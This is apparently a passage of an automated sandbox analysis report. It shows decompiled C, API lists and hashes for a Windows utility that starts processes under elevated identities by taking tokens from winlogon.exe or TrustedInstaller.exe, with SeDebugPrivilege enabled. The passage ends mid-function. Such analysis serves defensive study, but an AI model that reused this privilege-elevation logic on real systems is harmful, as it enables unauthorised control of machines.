                                                                                                                                                                  0x00402473
                                                                                                                                                                  0x00402473
                                                                                                                                                                  0x0040247c
                                                                                                                                                                  0x00402481
                                                                                                                                                                  0x00402488
                                                                                                                                                                  0x00402488
                                                                                                                                                                  0x00402495
                                                                                                                                                                  0x0040249a
                                                                                                                                                                  0x004024b7
                                                                                                                                                                  0x004024be
                                                                                                                                                                  0x004024cd
                                                                                                                                                                  0x004024d1
                                                                                                                                                                  0x004024ed
                                                                                                                                                                  0x004024f0
                                                                                                                                                                  0x00402506
                                                                                                                                                                  0x0040250b
                                                                                                                                                                  0x00402512
                                                                                                                                                                  0x00402518
                                                                                                                                                                  0x00402519
                                                                                                                                                                  0x0040251e
                                                                                                                                                                  0x00402524
                                                                                                                                                                  0x00402527
                                                                                                                                                                  0x0040252b
                                                                                                                                                                  0x00402530
                                                                                                                                                                  0x00402531
                                                                                                                                                                  0x00402531
                                                                                                                                                                  0x0040253d
                                                                                                                                                                  0x0040255a
                                                                                                                                                                  0x00402561
                                                                                                                                                                  0x00402570
                                                                                                                                                                  0x00402574
                                                                                                                                                                  0x00402590
                                                                                                                                                                  0x00402593
                                                                                                                                                                  0x004025a9
                                                                                                                                                                  0x004025ae
                                                                                                                                                                  0x004025b5
                                                                                                                                                                  0x004025bb
                                                                                                                                                                  0x004025bc
                                                                                                                                                                  0x004025c1
                                                                                                                                                                  0x004025c7
                                                                                                                                                                  0x004025ca
                                                                                                                                                                  0x004025cd
                                                                                                                                                                  0x004025ce
                                                                                                                                                                  0x004025d4
                                                                                                                                                                  0x004025d4
                                                                                                                                                                  0x004025da
                                                                                                                                                                  0x004025e3
                                                                                                                                                                  0x004025eb
                                                                                                                                                                  0x00402633
                                                                                                                                                                  0x004025fb
                                                                                                                                                                  0x00402608
                                                                                                                                                                  0x0040260f
                                                                                                                                                                  0x00402614
                                                                                                                                                                  0x00402624
                                                                                                                                                                  0x00402630
                                                                                                                                                                  0x00402630
                                                                                                                                                                  0x0040263a
                                                                                                                                                                  0x0040263b
                                                                                                                                                                  0x00402646
                                                                                                                                                                  0x0040264b
                                                                                                                                                                  0x0040264c
                                                                                                                                                                  0x0040265a
                                                                                                                                                                  0x0040265a
                                                                                                                                                                  0x0040265d
                                                                                                                                                                  0x00402666
                                                                                                                                                                  0x00402668
                                                                                                                                                                  0x00402668
                                                                                                                                                                  0x00402672
                                                                                                                                                                  0x00402675
                                                                                                                                                                  0x0040267e
                                                                                                                                                                  0x0040267e
                                                                                                                                                                  0x00402683
                                                                                                                                                                  0x0040268b
                                                                                                                                                                  0x0040269e
                                                                                                                                                                  0x0040269e
                                                                                                                                                                  0x004026a3
                                                                                                                                                                  0x004026ac
                                                                                                                                                                  0x004026b5
                                                                                                                                                                  0x004026b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026ae
                                                                                                                                                                  0x004026ae
                                                                                                                                                                  0x004026bf
                                                                                                                                                                  0x004026c1
                                                                                                                                                                  0x004026c6
                                                                                                                                                                  0x004026cc
                                                                                                                                                                  0x004026d5
                                                                                                                                                                  0x004026db
                                                                                                                                                                  0x004026e4
                                                                                                                                                                  0x004026ea
                                                                                                                                                                  0x004026f3
                                                                                                                                                                  0x004026f9
                                                                                                                                                                  0x00402707
                                                                                                                                                                  0x00402707
                                                                                                                                                                  0x0040270d
                                                                                                                                                                  0x00402710
                                                                                                                                                                  0x0040276d
                                                                                                                                                                  0x00402770
                                                                                                                                                                  0x0040280b
                                                                                                                                                                  0x0040280e
                                                                                                                                                                  0x00402813
                                                                                                                                                                  0x00402810
                                                                                                                                                                  0x00402810
                                                                                                                                                                  0x00402810
                                                                                                                                                                  0x00402819
                                                                                                                                                                  0x0040281f
                                                                                                                                                                  0x00402836
                                                                                                                                                                  0x00402841
                                                                                                                                                                  0x00402846
                                                                                                                                                                  0x0040284a
                                                                                                                                                                  0x00402851
                                                                                                                                                                  0x00402857
                                                                                                                                                                  0x00402860
                                                                                                                                                                  0x00402865
                                                                                                                                                                  0x00402876
                                                                                                                                                                  0x00402879
                                                                                                                                                                  0x00402888
                                                                                                                                                                  0x00402888
                                                                                                                                                                  0x00402857
                                                                                                                                                                  0x00402891
                                                                                                                                                                  0x0040289c
                                                                                                                                                                  0x0040289c
                                                                                                                                                                  0x00402779
                                                                                                                                                                  0x00402784
                                                                                                                                                                  0x0040278d
                                                                                                                                                                  0x004027a4
                                                                                                                                                                  0x004027b3
                                                                                                                                                                  0x004027b8
                                                                                                                                                                  0x004027bb
                                                                                                                                                                  0x004027bf
                                                                                                                                                                  0x004027c6
                                                                                                                                                                  0x004027c6
                                                                                                                                                                  0x004027d1
                                                                                                                                                                  0x004027d6
                                                                                                                                                                  0x004027d9
                                                                                                                                                                  0x004027db
                                                                                                                                                                  0x004027e2
                                                                                                                                                                  0x004027e4
                                                                                                                                                                  0x004027e4
                                                                                                                                                                  0x004027e7
                                                                                                                                                                  0x004027f4
                                                                                                                                                                  0x004027fc
                                                                                                                                                                  0x00402801
                                                                                                                                                                  0x00402801
                                                                                                                                                                  0x00402803
                                                                                                                                                                  0x00402803
                                                                                                                                                                  0x00402806
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402806
                                                                                                                                                                  0x00402715
                                                                                                                                                                  0x00402729
                                                                                                                                                                  0x0040272e
                                                                                                                                                                  0x00402731
                                                                                                                                                                  0x00402738
                                                                                                                                                                  0x00402738
                                                                                                                                                                  0x00402743
                                                                                                                                                                  0x00402748
                                                                                                                                                                  0x0040274d
                                                                                                                                                                  0x00402754
                                                                                                                                                                  0x00402756
                                                                                                                                                                  0x00402756
                                                                                                                                                                  0x00402759
                                                                                                                                                                  0x00402763
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402763
                                                                                                                                                                  0x004026fb
                                                                                                                                                                  0x00402700
                                                                                                                                                                  0x00402702
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402702
                                                                                                                                                                  0x004026ec
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026ec
                                                                                                                                                                  0x004026dd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026dd
                                                                                                                                                                  0x004026ce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026ce
                                                                                                                                                                  0x004026ac
                                                                                                                                                                  0x00402443
                                                                                                                                                                  0x0040246a
                                                                                                                                                                  0x00402470
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402470

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00402300
                                                                                                                                                                  • memset.MSVCRT ref: 0040233E
                                                                                                                                                                  • memset.MSVCRT ref: 00402356
                                                                                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT(00000000,?,00000104,?,00402FB2,0040ACC4,?,?,00000000), ref: 00404940
                                                                                                                                                                  • wcschr.MSVCRT ref: 00402387
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                                                                    • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                                                                    • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                                                                  • wcschr.MSVCRT ref: 004023B7
                                                                                                                                                                  • memset.MSVCRT ref: 004023D9
                                                                                                                                                                  • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040242B
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                                                                  • memset.MSVCRT ref: 004024BE
                                                                                                                                                                  • memset.MSVCRT ref: 004024D1
                                                                                                                                                                  • _wtoi.MSVCRT ref: 00402519
                                                                                                                                                                  • _wtoi.MSVCRT ref: 0040252B
                                                                                                                                                                  • memset.MSVCRT ref: 00402561
                                                                                                                                                                  • memset.MSVCRT ref: 00402574
                                                                                                                                                                  • _wtoi.MSVCRT ref: 004025BC
                                                                                                                                                                  • _wtoi.MSVCRT ref: 004025CE
                                                                                                                                                                  • wcschr.MSVCRT ref: 004025F0
                                                                                                                                                                  • memset.MSVCRT ref: 0040260F
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00402879
                                                                                                                                                                  • SetProcessAffinityMask.KERNEL32 ref: 00402888
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                                                                  • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                                                                  • API String ID: 2452314994-435178042
                                                                                                                                                                  • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                  • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                  • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                                                                                                                  0x00408533
                                                                                                                                                                  0x00408533
                                                                                                                                                                  0x00408536
                                                                                                                                                                  0x0040853e
                                                                                                                                                                  0x00408546
                                                                                                                                                                  0x0040854d
                                                                                                                                                                  0x00408559
                                                                                                                                                                  0x00408563
                                                                                                                                                                  0x00408569
                                                                                                                                                                  0x00408572
                                                                                                                                                                  0x00408583
                                                                                                                                                                  0x0040858d
                                                                                                                                                                  0x00408595
                                                                                                                                                                  0x0040859e
                                                                                                                                                                  0x004085a2
                                                                                                                                                                  0x004085a6
                                                                                                                                                                  0x004085aa
                                                                                                                                                                  0x004085ae
                                                                                                                                                                  0x004085b8
                                                                                                                                                                  0x004085c1
                                                                                                                                                                  0x004085c8
                                                                                                                                                                  0x004085cd
                                                                                                                                                                  0x004085cf
                                                                                                                                                                  0x0040867f
                                                                                                                                                                  0x00408688
                                                                                                                                                                  0x0040868d
                                                                                                                                                                  0x0040868f
                                                                                                                                                                  0x00408730
                                                                                                                                                                  0x00408735
                                                                                                                                                                  0x00408737
                                                                                                                                                                  0x0040873d
                                                                                                                                                                  0x00408750
                                                                                                                                                                  0x0040875d
                                                                                                                                                                  0x00408763
                                                                                                                                                                  0x00408770
                                                                                                                                                                  0x00408775
                                                                                                                                                                  0x00408779
                                                                                                                                                                  0x0040878b
                                                                                                                                                                  0x00408790
                                                                                                                                                                  0x004087a2
                                                                                                                                                                  0x004087aa
                                                                                                                                                                  0x004087b8
                                                                                                                                                                  0x004087be
                                                                                                                                                                  0x004087c3
                                                                                                                                                                  0x004087c9
                                                                                                                                                                  0x004087d2
                                                                                                                                                                  0x004087df
                                                                                                                                                                  0x004087e3
                                                                                                                                                                  0x004087e6
                                                                                                                                                                  0x00408801
                                                                                                                                                                  0x004087e8
                                                                                                                                                                  0x004087f8
                                                                                                                                                                  0x004087fe
                                                                                                                                                                  0x00408811
                                                                                                                                                                  0x00408816
                                                                                                                                                                  0x00408816
                                                                                                                                                                  0x0040881c
                                                                                                                                                                  0x00408822
                                                                                                                                                                  0x00408779
                                                                                                                                                                  0x00408824
                                                                                                                                                                  0x00408829
                                                                                                                                                                  0x00408833
                                                                                                                                                                  0x00408834
                                                                                                                                                                  0x00408840
                                                                                                                                                                  0x00408848
                                                                                                                                                                  0x0040884c
                                                                                                                                                                  0x00408850
                                                                                                                                                                  0x00408855
                                                                                                                                                                  0x0040885a
                                                                                                                                                                  0x00408860
                                                                                                                                                                  0x004088ac
                                                                                                                                                                  0x004088b1
                                                                                                                                                                  0x004088b3
                                                                                                                                                                  0x004088bf
                                                                                                                                                                  0x004088c5
                                                                                                                                                                  0x004088cb
                                                                                                                                                                  0x004088da
                                                                                                                                                                  0x004088ea
                                                                                                                                                                  0x004088ed
                                                                                                                                                                  0x004088f8
                                                                                                                                                                  0x004088ff
                                                                                                                                                                  0x00408905
                                                                                                                                                                  0x004088b5
                                                                                                                                                                  0x004088b5
                                                                                                                                                                  0x004088b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408862
                                                                                                                                                                  0x00408862
                                                                                                                                                                  0x0040886d
                                                                                                                                                                  0x00408874
                                                                                                                                                                  0x0040887b
                                                                                                                                                                  0x00408882
                                                                                                                                                                  0x00408889
                                                                                                                                                                  0x00408895
                                                                                                                                                                  0x00408897
                                                                                                                                                                  0x00408658
                                                                                                                                                                  0x00408658
                                                                                                                                                                  0x0040865d
                                                                                                                                                                  0x00408661
                                                                                                                                                                  0x0040866a
                                                                                                                                                                  0x00408673
                                                                                                                                                                  0x00408678
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408678
                                                                                                                                                                  0x00408860
                                                                                                                                                                  0x00408695
                                                                                                                                                                  0x00408695
                                                                                                                                                                  0x0040869f
                                                                                                                                                                  0x004086a2
                                                                                                                                                                  0x004086af
                                                                                                                                                                  0x004086a4
                                                                                                                                                                  0x004086a7
                                                                                                                                                                  0x004086a7
                                                                                                                                                                  0x004086b4
                                                                                                                                                                  0x004086bf
                                                                                                                                                                  0x004086cb
                                                                                                                                                                  0x004086d3
                                                                                                                                                                  0x004086d7
                                                                                                                                                                  0x004086db
                                                                                                                                                                  0x004086e0
                                                                                                                                                                  0x004086f1
                                                                                                                                                                  0x004086f8
                                                                                                                                                                  0x004086ff
                                                                                                                                                                  0x00408706
                                                                                                                                                                  0x0040870d
                                                                                                                                                                  0x00408719
                                                                                                                                                                  0x0040871b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040871b
                                                                                                                                                                  0x004085d5
                                                                                                                                                                  0x004085da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004085ec
                                                                                                                                                                  0x004085ef
                                                                                                                                                                  0x004085f6
                                                                                                                                                                  0x004085fd
                                                                                                                                                                  0x00408604
                                                                                                                                                                  0x0040860b
                                                                                                                                                                  0x00408612
                                                                                                                                                                  0x00408616
                                                                                                                                                                  0x00408620
                                                                                                                                                                  0x0040862a
                                                                                                                                                                  0x00408632
                                                                                                                                                                  0x00408633
                                                                                                                                                                  0x00408638
                                                                                                                                                                  0x0040864f
                                                                                                                                                                  0x00408651
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040854f
                                                                                                                                                                  0x0040854f
                                                                                                                                                                  0x00408550
                                                                                                                                                                  0x00408556
                                                                                                                                                                  0x00408556

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                    • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040316E
                                                                                                                                                                    • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                    • Part of subcall function 0040313D: MessageBoxW.USER32 ref: 004031AD
                                                                                                                                                                  • SetErrorMode.KERNEL32(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                                                                  • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                                                                  • swscanf.MSVCRT ref: 00408620
                                                                                                                                                                  • _wtoi.MSVCRT ref: 00408633
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                                                                  • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                                                                  • API String ID: 3933224404-3784219877
                                                                                                                                                                  • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                                                                  • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                                                                  • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                                                                  • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                  			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
